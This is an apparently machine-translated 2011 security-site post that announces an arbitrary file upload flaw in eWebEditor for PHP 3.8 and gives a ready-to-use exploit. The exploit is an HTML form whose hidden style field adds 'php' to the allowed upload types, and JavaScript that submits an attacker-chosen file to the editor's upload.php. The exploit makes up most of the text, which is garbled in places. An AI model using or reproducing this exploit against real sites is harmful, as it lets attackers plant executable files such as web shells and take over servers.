ewebeditor for PHP 3. 8 version upload any files 0day-vulnerability warning-the black bar safety net

2011-08-02T00:00:00
ID MYHACK58:62201131423
Type myhack58
Reporter 佚名
Modified 2011-08-02T00:00:00

Description

|

PHP version of ewebeditor to use than the ASP version of the little much for it, I was very little encounter. Looks like

I heard that foreign used very much. Taiwan people like to use? With the concern about it.

EXP is as follows:

<form action="" method=post enctype="multipart/form-data"> <INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="5 1 2 0 0 0"> URL:<input type=text name=url value="http://www.xxx.com/ewebeditor/" size=1 0 0><br> <INPUT TYPE="hidden" name="aStyle[1 2]" value="toby57|||gray|||red|||../uploadfile/|||5 5 0|||3 5 0|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||5 0 0|||1 0 0|||1 0 0|||1 0 0|||1 0 0 |||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||5 0 0|||3 0 0|||0|||...|||FF0000|||1 2|||Arial||||||0|||jpg|jpeg|||3 0 0|||FFFFFF|||1"> file:<input type=file name="uploadfile"><br> <input type=button value=submit onclick=fsubmit()> </form><br> <script> function fsubmit(){ form = document. forms[0]; form. action = form. url. value+'php/upload. php? action=save&type=FILE&style=toby57&language=en'; alert(form. action); form. submit(); } </script>